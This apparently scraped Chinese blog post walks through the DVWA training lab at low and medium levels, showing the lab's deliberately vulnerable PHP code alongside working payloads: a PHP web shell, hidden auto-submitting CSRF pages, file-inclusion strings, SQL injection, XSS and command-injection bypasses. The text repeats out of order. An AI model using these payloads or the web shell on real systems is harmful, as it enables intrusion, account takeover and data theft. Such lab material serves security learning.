text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Referer: http://192.168.31.84:81/vulnerabilities/csrf/?password_new=password&amp;password_conf=123&amp;Change=ChangeAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: PHPSESSID=rbb91verhfhas5a6k7tq77bmo4; security=lowConnection: close 根据拦截的http请求，可以伪造如下链接让受害者点击，从而修改密码http://ip:port/vulnerabilities/csrf/?password_new=test&amp;password_conf=test&amp;Change=Change 更具隐藏性的方式：1.使用短链接来隐藏 URL：为了更加隐蔽，可以生成短网址链接，点击短链接，会自动跳转到真实网站：http://tinyurl.com/yd2gogtvPS:提供一个短网址生成网站2.构造攻击页面： 方式 1 通过img标签中的src属性来加载CSRF攻击利用的URL，并进行布局隐藏，实现了受害者点击链接则会将密码修改。 方式 2 查看页面html源代码，将关于密码操作的表单部分，通过javascript的onload事件加载和css代码来隐藏布局，按GET传递参数的方式，进一步构造html form表单，实现了受害者点击链接则会将密码修改。1234567891011121314151617181920&lt;body onload="javascript:csrf()"&gt;&lt;script&gt;function csrf()&#123;document.getElementById("button").click();&#125;&lt;/script&gt;&lt;style&gt;form&#123;display:none;&#125;&lt;/style&gt; &lt;form action="http://www.dvwa.com/vulnerabilities/csrf/?" method="GET"&gt; New password:&lt;br /&gt; &lt;input type="password" AUTOCOMPLETE="off" name="password_new" value="test"&gt;&lt;br /&gt; Confirm new password:&lt;br /&gt; &lt;input type="password" AUTOCOMPLETE="off" name="password_conf" value="test"&gt;&lt;br /&gt; &lt;br /&gt; &lt;input type="submit" id="button" name="Change" value="Change" /&gt; &lt;/form&gt;&lt;/body&gt; 构造攻击页面 现实攻击场景下，这种方法需要事先在公网上传一个攻击页面，诱骗受害者去访问，真正能够在受害者不知情的情况下完成CSRF攻击。这里为了方便演示，就在本地写一个test.html，下面是具体代码。 123&lt;img src=&quot;http://192.168.31.84:81/vulnerabilities/csrf/?password_new=111&amp;password_conf=111&amp;Change=Change# border=&quot;0&quot; style=&quot;display:none;&quot;/&gt;&lt;h1&gt;404&lt;/h1&gt;&lt;h2&gt;file not found.&lt;/h2&gt; 当受害者访问test.html时，会误认为是自己点击的是一个失效的url，但实际上已经遭受了CSRF攻击，密码已经被修改为了hack。 medium模式检查 HTTP_REFERER（http包头的Referer参数的值，表示来源地址）中是否包含SERVER_NAME（http包头的Host参数，及要访问的主机名，）12// Checks to see where the request came from if( stripos( $_SERVER[ &apos;HTTP_REFERER&apos; ] ,$_SERVER[ &apos;SERVER_NAME&apos; ]) !== false ) &#123; 想要通过验证，就必须保证在http请求中Referer字段中必须包含Host我们这需要把上面的攻击页面名字改成包含host就可以了。(把攻击页面放在服务器上) 文件包含easy模式某些Web应用程序允许用户指定直接用于文件流的输入，或允许用户将文件上载到服务器。稍后，Web应用程序访问Web应用程序上下文中的用户提供的输入。通过这样做，Web应用程序允许潜在的恶意文件执行。如果选择要包含的文件在目标计算机上是本地的，则称为“本地文件包含（LFI）。但是文件也可以包含在其他计算机上，然后攻击是”远程文件包含（RFI）。当RFI不是一种选择时。使用LFI的另一个漏洞（例如文件上传和目录遍历）通常可以达到同样的效果。注意，术语“文件包含”与“任意文件访问”或“文件公开”不同。只使用文件包含来阅读’../hackable/flags/fi.php’中的所有五个着名引号。123456&lt;?php// The page we wish to display$file = $_GET[ &apos;page&apos; ];?&gt; 文件包含漏洞的一般特征如下： ?page=a.php ?home=a.html ?file=content 几种经典的测试方法： ?file=../../../../../etc/passwdd?page=file:///etc/passwd?home=main.cgi?page=http://www.a.com/1.php=http://1.1.1.1/../../../../dir/file.txt（通过多个../可以让目录回到根目录中然后再进入目标目录） medium模式增加对绝对路径http和相对路径的检查123// Input validation$file = str_replace( array( &quot;http://&quot;, &quot;https://&quot; ), &quot;&quot;, $file );$file = str_replace( array( &quot;../&quot;, &quot;..\&quot;&quot; ), &quot;&quot;, $file ); 但依然可以使用?page=file:///etc/passwd以及重复字符过滤方法,构造url 构造url为httphttp:// –&gt; http 构造url为httphttp://:// –&gt;http:// 构造url为…/./ –&gt; ../ 文件上传easy模式 上传的文件对Web应用程序构成重大风险。许多攻击的第一步是将一些代码提供给系统进行攻击。然后攻击者只需要找到一种方法来执行代码。使用文件上传有助于攻击者完成第一步。不受限制的文件上载的后果可能会有所不同，包括完整的系统接管，过载的文件系统，向后端系统转发攻击以及简单的污损。这取决于应用程序对上传文件的作用，包括存储位置。由于此文件上载漏洞，请在目标系统上执行您选择的任何PHP函数（例如phpinfo（）或system（））。 一句话木马1.php文件：123&lt;?phpecho shell_exec($_GET[&apos;cmd&apos;]);?&gt; 12345678910111213141516171819&lt;?phpif( isset( $_POST[ 'Upload' ] ) ) &#123; // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) &#123; // No echo '&lt;pre&gt;Your image was not uploaded.&lt;/pre&gt;'; &#125; else &#123; // Yes! echo "&lt;pre&gt;&#123;$target_path&#125; succesfully uploaded!&lt;/pre&gt;"; &#125;&#125;?&gt; medium模式增加了对文件类型和大小的过滤，只允许图片上传12345678// File information$uploaded_name = $_FILES[ &apos;uploaded&apos; ][ &apos;name&apos; ];$uploaded_type = $_FILES[ &apos;uploaded&apos; ][ &apos;type&apos; ];$uploaded_size = $_FILES[ &apos;uploaded&apos; ][ &apos;size&apos; ];// Is it an image?if( ( $uploaded_type == &quot;image/jpeg&quot; || $uploaded_type == &quot;image/png&quot; ) &amp;&amp; ( $uploaded_size &lt; 100000 ) ) &#123; 用burpsuite拦截修改Content-Type: application/octet-stream为Content-Type: image/jpeg。成功上传：http://192.168.31.84:81/hackable/uploads/1.php?cmd=ls SQL注入easy模式 SQL注入攻击包括通过从客户端到应用程序的输入数据插入或“注入”SQL查询。成功的SQL注入攻击可以从数据库中读取敏感数据，修改数据库数据（插入/更新/删除），对数据库执行管理操作（如关闭DBMS），恢复DBMS文件中存在的给定文件的内容system（load_file），在某些情况下向操作系统发出命令。SQL注入攻击是一种注入攻击，其中SQL命令被注入到数据平面输入中，以便实现预定义的SQL命令。这种攻击也可称为“SQLi”。 123456789101112131415161718192021222324&lt;?phpif( isset( $_REQUEST[ &apos;Submit&apos; ] ) ) &#123; // Get input $id = $_REQUEST[ &apos;id&apos; ]; // Check database $query = &quot;SELECT first_name, last_name FROM users WHERE user_id = &apos;$id&apos;;&quot;; $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;], $query ) or die( &apos;&lt;pre&gt;&apos; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &apos;&lt;/pre&gt;&apos; ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) &#123; // Get values $first = $row[&quot;first_name&quot;]; $last = $row[&quot;last_name&quot;]; // Feedback for end user echo &quot;&lt;pre&gt;ID: &#123;$id&#125;&lt;br /&gt;First name: &#123;$first&#125;&lt;br /&gt;Surname: &#123;$last&#125;&lt;/pre&gt;&quot;; &#125; mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]);&#125;?&gt; 在做查询操作时，未对$id做任何限制，直接传入了sql语句，造成字符型注入 原SELECT语句SELECT first_name, last_name FROM users WHERE user_id = &#39;$id&#39;;中的$id可以任意输入。当输入$id=123’ OR 1=1#时，SELECT语句变成了SELECT first_name, last_name FROM users WHERE user_id = &#39;123&#39; OR 1=1#&#39;;此时最后一个引号被#注释，同时1=1永远返回TRUE，这就导致所有用户的姓名泄露。123456789101112131415ID: 123&apos; OR 1=1#First name: adminSurname: adminID: 123&apos; OR 1=1#First name: GordonSurname: BrownID: 123&apos; OR 1=1#First name: HackSurname: MeID: 123&apos; OR 1=1#First name: PabloSurname: PicassoID: 123&apos; OR 1=1#First name: BobSurname: Smith 那如果想要得到密码该怎么做，UNION 操作符用于合并两个或多个 SELECT 语句的结果集，我们可以这样构造id$id=123&#39; or 1=1# union SELECT first_name,password FROM但貌似表里没有password12345678910111213141516usersID: 123&apos; or 1=1# union SELECT first_name,password FROM usersFirst name: adminSurname: adminID: 123&apos; or 1=1# union SELECT first_name,password FROM usersFirst name: GordonSurname: BrownID: 123&apos; or 1=1# union SELECT first_name,password FROM usersFirst name: HackSurname: MeID: 123&apos; or 1=1# union SELECT first_name,password FROM usersFirst name: PabloSurname: PicassoID: 123&apos; or 1=1# union SELECT first_name,password FROM usersFirst name: BobSurname: Smith medium模式前端只能选择，前源码过滤了字符$id = mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;], $id);其中受影响的字符如下：1234567\x00\n\r\&apos;&quot;\x1a 但由于其为字符型注入，因此防御手段形同虚设构造id=1 or 1=1#即得到所有用户信息 SQL盲注 盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。1.判断是否存在注入，注入是字符型还是数字型2.猜解当前数据库名3.猜解数据库中的表名4.猜解表中的字段名5.猜解数据 12345678910111213141516171819202122232425262728&lt;?phpif( isset( $_GET[ &apos;Submit&apos; ] ) ) &#123; // Get input $id = $_GET[ &apos;id&apos; ]; // Check database $getid = &quot;SELECT first_name, last_name FROM users WHERE user_id = &apos;$id&apos;;&quot;; $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;], $getid ); // Removed &apos;or die&apos; to suppress mysql errors // Get results $num = @mysqli_num_rows( $result ); // The &apos;@&apos; character suppresses errors if( $num &gt; 0 ) &#123; // Feedback for end user echo &apos;&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;&apos;; &#125; else &#123; // User wasn&apos;t found, so the page wasn&apos;t! header( $_SERVER[ &apos;SERVER_PROTOCOL&apos; ] . &apos; 404 Not Found&apos; ); // Feedback for end user echo &apos;&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;&apos;; &#125; ((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);&#125;?&gt; 查看源码发现还是没有对id做过滤，但是它不会返回错误信息，只会告诉你User ID exists in the database.以及User ID is MISSING from the database. 盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注。如果手工盲注的话，需要对sql语法相当熟悉。类似：https://www.freebuf.com/articles/web/120985.html如果自动盲注的话，可以使用sqlmap来完成，类似：https://www.jianshu.com/p/ec2ca79e74b2 弱session-ideasy模式session-ID通常是在登录后作为特定用户访问站点所需的唯一内容，如果能够计算或轻易猜到该会话ID，则攻击者将有一种简单的方法来获取访问权限。无需知道账户密码或查找其他漏洞，如跨站点脚本。 根据源码可以看出来session每次加112345678910111213&lt;?php$html = &quot;&quot;;if ($_SERVER[&apos;REQUEST_METHOD&apos;] == &quot;POST&quot;) &#123; if (!isset ($_SESSION[&apos;last_session_id&apos;])) &#123; $_SESSION[&apos;last_session_id&apos;] = 0; &#125; $_SESSION[&apos;last_session_id&apos;]++; $cookie_value = $_SESSION[&apos;last_session_id&apos;]; setcookie(&quot;dvwaSession&quot;, $cookie_value);&#125;?&gt; 按f12看application-cookies也能发现这个规律。然后使用hackbar这个扩展程序攻击。 medium模式从源码中可以看到dvwaSession就是时间戳123456789&lt;?php$html = &quot;&quot;;if ($_SERVER[&apos;REQUEST_METHOD&apos;] == &quot;POST&quot;) &#123; $cookie_value = time(); setcookie(&quot;dvwaSession&quot;, $cookie_value);&#125;?&gt; 基于DOM的XSSeasy模式 “跨站点脚本（XSS）”攻击是一种注入问题，其中恶意脚本被注入到其他良性和可信赖的网站中。当攻击者使用Web应用程序将恶意代码（通常以浏览器端脚本的形式）发送给不同的最终用户时，就会发生XSS攻击。允许这些攻击成功的缺陷非常普遍，并且发生在使用输出中的用户输入的Web应用程序的任何地方，而不验证或编码它。 攻击者可以使用XSS将恶意脚本发送给毫无戒心的用户。最终用户的浏览器无法知道该脚本不应该被信任，并将执行JavaScript。因为它认为脚本来自可靠来源，所以恶意脚本可以访问您的浏览器保留并与该站点一起使用的任何cookie，会话令牌或其他敏感信息。这些脚本甚至可以重写HTML页面的内容。 基于DOM的XSS是一个特殊情况，反映了JavaScript隐藏在URL中并在呈现时由页面中的JavaScript拉出而不是在服务时嵌入页面中。这可能使其比其他攻击更隐蔽，并且正在阅读页面主体的WAF或其他保护措施看不到任何恶意内容。 查看页面源代码12345678910111213&lt;script&gt; if (document.location.href.indexOf(&quot;default=&quot;) &gt;= 0) &#123; var lang = document.location.href.substring(document.location.href.indexOf(&quot;default=&quot;)+8); document.write(&quot;&lt;option value=&apos;&quot; + lang + &quot;&apos;&gt;&quot; + decodeURI(lang) + &quot;&lt;/option&gt;&quot;); document.write(&quot;&lt;option value=&apos;&apos; disabled=&apos;disabled&apos;&gt;----&lt;/option&gt;&quot;); &#125; document.write(&quot;&lt;option value=&apos;English&apos;&gt;English&lt;/option&gt;&quot;); document.write(&quot;&lt;option value=&apos;French&apos;&gt;French&lt;/option&gt;&quot;); document.write(&quot;&lt;option value=&apos;Spanish&apos;&gt;Spanish&lt;/option&gt;&quot;); document.write(&quot;&lt;option value=&apos;German&apos;&gt;German&lt;/option&gt;&quot;);&lt;/script&gt; indexOf() 方法可返回某个指定的字符串值在字符串中首次出现的位置。 substring() 方法用于提取字符串中介于两个指定下标之间的字符。 decodeURI() 函数可对 encodeURI() 函数编码过的 URI 进行解码 所以lang被赋值为”default=”之后的字串，如果插入js代码，插入的 javascript 代码可以在 decodeURL(lang) 被执行 http://192.168.31.84:81/vulnerabilities/xss_d/?default=English&lt;script&gt;alert(document.cookie)&lt;/script&gt;这个uri被用户点击之后会被弹窗，但是在chrome测试了很多次都不行，firefox就可以 medium模式相对于easy模式增加了对script的过滤12345# Do not allow script tagsif (stripos ($default, &quot;&lt;script&quot;) !== false) &#123; header (&quot;location: ?default=English&quot;); exit;&#125; 绕过有两种方式 方式1url中有一个字符为#，该字符后的数据不会发送到服务器端，从而绕过服务端过滤http://192.168.31.84:81/vulnerabilities/xss_d/?default=English#&lt;script&gt;alert(document.cookie)&lt;/script&gt; 方法2或者就是用img标签或其他标签的特性去执行js代码，比如img标签的onerror事件，构造连接(通过加载一个不存在的图片出错出发javascript onerror事件,继续弹框，证明出来有xss)`http://192.168.31.84:81/vulnerabilities/xss_d/?default=English%3E/option%3E%3C/select%3E%3Cimg%20src=#%20onerror=alert(/xss/)%3E&#39; 反射型xsseasy模式 反射型（非持久）：主要用于将恶意代码附加到URL地址的参数中，常用于窃取客户端cookie信息和钓鱼欺骗。 查看源码，服务器直接把客户端的输入返回回来显示1234567891011&lt;?phpheader ("X-XSS-Protection: 0");// Is there any input?if( array_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != NULL ) &#123; // Feedback for end user echo '&lt;pre&gt;Hello ' . $_GET[ 'name' ] . '&lt;/pre&gt;';&#125;?&gt; http://192.168.31.84:81/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(%27xss%27)%3C/script%3E medium模式源码里检查了script标签12// Get input $name = str_replace( &apos;&lt;script&gt;&apos;, &apos;&apos;, $_GET[ &apos;name&apos; ] ); str_replace这个函数是不区分大小写的，而且只替换一次改成大写就可以了alert(‘xss’)或者嵌套&lt;script&gt;alert(‘xss’) 但对name审查没有这么严格，同样可以采用嵌套或大小写的方法： &lt;script&gt;alert(‘fuck’) alert(‘fuck’) 存储型xsseasy模式 “跨站点脚本（XSS）”攻击是一种注入问题，其中恶意脚本被注入到其他良性和可信赖的网站中。当攻击者使用Web应用程序将恶意代码（通常以浏览器端脚本的形式）发送给不同的最终用户时，就会发生XSS攻击。允许这些攻击成功的缺陷非常普遍，并且发生在使用输出中的用户输入的Web应用程序的任何地方，而不验证或编码它。 攻击者可以使用XSS将恶意脚本发送给毫无戒心的用户。最终用户的浏览器无法知道该脚本不应该被信任，并将执行JavaScript。因为它认为脚本来自可靠来源，所以恶意脚本可以访问您的浏览器保留并与该站点一起使用的任何cookie，会话令牌或其他敏感信息。这些脚本甚至可以重写HTML页面的内容。 XSS存储在数据库中。 XSS是永久性的，直到重置数据库或手动删除有效负载。 查看源码trim是去除掉用户输入内容前后的空格。stripslashes是去除反斜杠，两个只会去除一个。mysqli_real_escap_string过滤掉内容中特殊字符，像x00,n,r,,’,”,x1a等，来预防数据库攻击。12345678910111213141516171819202122&lt;?phpif( isset( $_POST[ &apos;btnSign&apos; ] ) ) &#123; // Get input $message = trim( $_POST[ &apos;mtxMessage&apos; ] ); $name = trim( $_POST[ &apos;txtName&apos; ] ); // Sanitize message input $message = stripslashes( $message ); $message = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;], $message ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;)); // Sanitize name input $name = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;], $name ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;)); // Update database $query = &quot;INSERT INTO guestbook ( comment, name ) VALUES ( &apos;$message&apos;, &apos;$name&apos; );&quot;; $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;], $query ) or die( &apos;&lt;pre&gt;&apos; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &apos;&lt;/pre&gt;&apos; ); //mysql_close();&#125;?&gt; 插入之后会成为页面的元素显示出来&lt;div id=&quot;guestbook_comments&quot;&gt;Name: 11&lt;br /&gt;Message: 111&lt;br /&gt;&lt;/div&gt;看一下提交的方式：txtName=22&amp;mtxMessage=222&amp;btnSign=Sign+Guestbook直接插入script语句，txtName=22&lt;script&gt;alert(1)&lt;/script&gt;&amp;mtxMessage=222&amp;btnSign=Sign+Guestbook medium模式源码中增加了几个函数的使用： $message = strip_tags(addslashes($message)); 剥去字符串中的 HTML、XML 以及 PHP 的标签。 $message = htmlspecialchars( $message ); 把预定义的字符 “&lt;” （小于）和 “&gt;” （大于）转换为 HTML 实体： $name = str_replace( ‘‘, ‘’, $name ); 绕过安全策略easy模式 内容安全策略（CSP）用于定义可以从中加载或执行脚本和其他资源的位置。本单元将引导您根据开发人员常见错误绕过策略。这些漏洞都不是CSP中的实际漏洞，它们是实施漏洞的漏洞。 12345678910111213141516171819202122&lt;?php$headerCSP = &quot;Content-Security-Policy: script-src &apos;self&apos; https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;&quot;; // allows js from self, pastebin.com, jquery and google analytics.header($headerCSP);# https://pastebin.com/raw/R570EE00?&gt;&lt;?phpif (isset ($_POST[&apos;include&apos;])) &#123;$page[ &apos;body&apos; ] .= &quot; &lt;script src=&apos;&quot; . $_POST[&apos;include&apos;] . &quot;&apos;&gt;&lt;/script&gt;&quot;;&#125;$page[ &apos;body&apos; ] .= &apos;&lt;form name=&quot;csp&quot; method=&quot;POST&quot;&gt; &lt;p&gt;You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:&lt;/p&gt; &lt;input size=&quot;50&quot; type=&quot;text&quot; name=&quot;include&quot; value=&quot;&quot; id=&quot;include&quot; /&gt; &lt;input type=&quot;submit&quot; value=&quot;Include&quot; /&gt;&lt;/form&gt;&apos;; 会在页面里增加一个body&lt;script src=&#39;&quot; . $_POST[&#39;include&#39;] . &quot;&#39;&gt;&lt;/script&gt;这里在源码中规定了信任的脚本源：script-src &#39;self&#39; https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;&quot;; // allows js from self, pastebin.com, jquery and google analytics.输入源码中提示的https://pastebin.com/raw/R570EE00，弹窗成功 medium模式如果你要使用 script 标签加载 javascript, 你需要指明其 nonce 值$headerCSP = &quot;Content-Security-Policy: script-src &#39;self&#39; &#39;unsafe-inline&#39; &#39;nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=&#39;;&quot;;比如：&lt;script nonce=&quot;TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=&quot;&gt;alert(1)&lt;/script&gt; JavaScript Attackseasy模式 本节中的攻击旨在帮助您了解JavaScript在浏览器中的使用方式以及如何操作它。攻击可以通过分析网络流量来进行，但这不是重点，也可能要困难得多。只需提交“成功”一词即可赢得关卡。显然，它并不那么容易，每个级别实现不同的保护机制，页面中包含的JavaScript必须进行分析，然后进行操作以绕过保护。 提示我们Submit the word “success” to win.但是输入success却返回Invalid token.说明token值不对劲，后台应该是比较输入的字符串与‘success’。查看源码发现token值是在前台计算的，md5(rot13(phrase))123456function generate_token() &#123; var phrase = document.getElementById(&quot;phrase&quot;).value; document.getElementById(&quot;token&quot;).value = md5(rot13(phrase));&#125;generate_token(); 然而，phrase的值等于ChangeMe&lt;input type=&quot;text&quot; name=&quot;phrase&quot; value=&quot;ChangeMe&quot; id=&quot;phrase&quot;&gt;因此计算出来的token也是不对的，我们在chrome的控制台直接计算12md5(rot13(&quot;success&quot;))&quot;38581812b435834ebf84ebcc2c6424d6&quot; 把值给隐藏的元素&lt;input type=&quot;hidden&quot; name=&quot;token&quot; value=&quot;8b479aefbd90795395b3e7089ae0dc09&quot; id=&quot;token&quot;&gt;然后提交success medium模式生成token的代码在js文件中1234567891011function do_something(e) &#123; for (var t = "", n = e.length - 1; n &gt;= 0; n--) t += e[n]; return t&#125;setTimeout(function () &#123; do_elsesomething("XX")&#125;, 300);function do_elsesomething(e) &#123; document.getElementById("token").value = do_something(e + document.getElementById("phrase").value + "XX")&#125; 输入success，然后控制台运行do_elsesomething(“XX”)就可以拿到token]]></content>
+    <content type="text"><![CDATA[搭建环境最好使用docker来搭建，方便迁移 https://hub.docker.com/r/vulnerables/web-dvwa/ 暴力破解easy模式 密码破解是从存储在计算机系统中或由计算机系统传输的数据中恢复密码的过程。一种常见的方法是反复尝试密码的猜测。用户经常选择弱密码。不安全选择的例子包括在词典中找到的单个单词，姓氏，任何太短的密码（通常被认为少于6或7个字符），或可预测的模式（例如交替的元音和辅音，这被称为leetspeak，所以“密码“变成”p @ 55w0rd“）。创建针对目标生成的目标单词列表通常会提供最高的成功率。有一些公共工具可以根据公司网站，个人社交网络和其他常见信息（如生日或毕业年份）的组合创建字典。最后一种方法是尝试所有可能的密码，称为暴力攻击。从理论上讲，如果尝试次数没有限制，那么暴力攻击将永远是成功的，因为可接受密码的规则必须是公开的;但随着密码长度的增加，可能的密码数量也越来越长。 使用burpsuite可破之，Burp suite运行后，Proxy 开起默认的8080 端口作为本地代理接口。使用Burp suite通过置一个web 浏览器使用其代理服务器123456789101112131415161718192021222324252627282930313233&lt;?phpif( isset( $_GET[ 'Login' ] ) ) &#123; // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '&lt;pre&gt;' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '&lt;/pre&gt;' ); if( $result &amp;&amp; mysqli_num_rows( $result ) == 1 ) &#123; // Get users details $row = mysqli_fetch_assoc( $result ); $avatar = $row["avatar"]; // Login successful echo "&lt;p&gt;Welcome to the password protected area &#123;$user&#125;&lt;/p&gt;"; echo "&lt;img src=\"&#123;$avatar&#125;\" /&gt;"; &#125; else &#123; // Login failed echo "&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;/pre&gt;"; &#125; ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);&#125;?&gt; PHP $_GET 变量在 PHP 中，预定义的 $_GET 变量用于收集来自 method=”get” 的表单中的值。 $_GET 变量预定义的 $_GET 变量用于收集来自 method=”get” 的表单中的值。从带有 GET 方法的表单发送的信息，对任何人都是可见的（会显示在浏览器的地址栏），并且对发送信息的量也有限制。 何时使用 method=”get”？在 HTML 表单中使用 method=”get” 时，所有的变量名和值都会显示在 URL 中。所以在发送密码或其他敏感信息时，不应该使用这个方法！然而，正因为变量显示在 URL 中，因此可以在收藏夹中收藏该页面。在某些情况下，这是很有用的。HTTP GET 方法不适合大型的变量值。它的值是不能超过 2000 个字符的。 12345678910GET /vulnerabilities/brute/?username=admin123&amp;password=123&amp;Login=Login HTTP/1.1Host: 192.168.31.84:81Proxy-Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Referer: http://192.168.31.84:81/vulnerabilities/brute/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: PHPSESSID=rbb91verhfhas5a6k7tq77bmo4; security=low 我们可以看到username和password是以明文出现，可以修改。 将请求进行提交到intruder模块，在那里可以把password设置为我们破解的payload.点击Start attack~然后就根据对面返回包的大小，知道密码，’password’返回的长度更长 medium模式代码与前面相比只是多了要用mysqli_real_escape_string函数进行验证，以及登录失败会 sleep(2)。将用户名和密码转义，比如说 \n 被转义成 \n，’ 转义成 \’，这可以抵御一些 SQL 注入攻击，但是不能抵御爆破。 命令执行easy模式 命令注入攻击的目的是在易受攻击的应用程序中注入和执行攻击者指定的命令。在这种情况下，执行不需要的系统命令的应用程序就像一个伪系统shell，攻击者可以将它用作任何授权的系统用户。但是，命令的执行具有与Web服务相同的权限和环境。 在大多数情况下，命令注入攻击是可能的，因为缺少正确的输入数据验证，攻击者可以操纵它（表单，cookie，HTTP头等）。 操作系统（OS）（例如Linux和Windows）的语法和命令可能不同，具体取决于所需的操作。 此攻击也可称为“远程命令执行（RCE）”。 123456789101112131415161718192021&lt;?phpif( isset( $_POST[ 'Submit' ] ) ) &#123; // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) &#123; // Windows $cmd = shell_exec( 'ping ' . $target ); &#125; else &#123; // *nix $cmd = shell_exec( 'ping -c 4 ' . $target ); &#125; // Feedback for the end user echo "&lt;pre&gt;&#123;$cmd&#125;&lt;/pre&gt;";&#125;?&gt; 可见，服务器无条件执行了ping $target的命令，如果注入$target = 0 | dir，服务器就会执行dir 管道符号，是unix一个很强大的功能,符号为一条竖线:”|”。用法: command 1 | command 2 他的功能是把第一个命令command 1执行的结果作为command 2的输入传给command 2 任意命令执行漏洞修补办法在写程序时尽量地使变量不能被用户所控制！且注意变量初始化的问题。 使用str_replace对“%”，”|”,“&gt;”进行替换 进入函数前判断变量是否合法。 medium模式无非就是增加了一个黑名单 &amp;&amp;和；，但还是可以用管道|和&amp;12345// Set blacklist$substitutions = array( &apos;&amp;&amp;&apos; =&gt; &apos;&apos;, &apos;;&apos; =&gt; &apos;&apos;,); 这里需要注意的是”&amp;&amp;”与”&amp;”的区别：Command 1&amp;&amp;Command 2先执行Command 1，执行成功后执行Command 2，否则不执行Command 2Command 1&amp;Command 2先执行Command 1，不管是否成功，都会执行Command 2 更聪明的做法是利用&amp;;&amp;，黑名单会将其转化为&amp;&amp; CSRFeasy模式 CSRF跨站请求伪造是一种攻击，它强制终端用户在当前对其进行身份验证的Web应用程序上执行不需要的操作。在社交工程的帮助下（例如通过电子邮件/聊天发送链接），攻击者可能会强制Web应用程序的用户执行攻击者选择的操作。成功的CSRF利用可能会损害最终用户数据和普通用户的操作。如果目标最终用户是管理员帐户，则可能会危及整个Web应用程序。此攻击也可称为“XSRF”，类似于“跨站点脚本（XSS）”，它们通常一起使用。您的任务是让当前用户使用CSRF攻击更改自己的密码，而无需他们了解自己的操作。 1234567891011121314151617181920212223242526272829&lt;?phpif( isset( $_GET[ 'Change' ] ) ) &#123; // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) &#123; // They do! $pass_new = ((isset($GLOBALS["___mysqli_ston"]) &amp;&amp; is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass_new = md5( $pass_new ); // Update the database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '&lt;pre&gt;' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '&lt;/pre&gt;' ); // Feedback for the user echo "&lt;pre&gt;Password 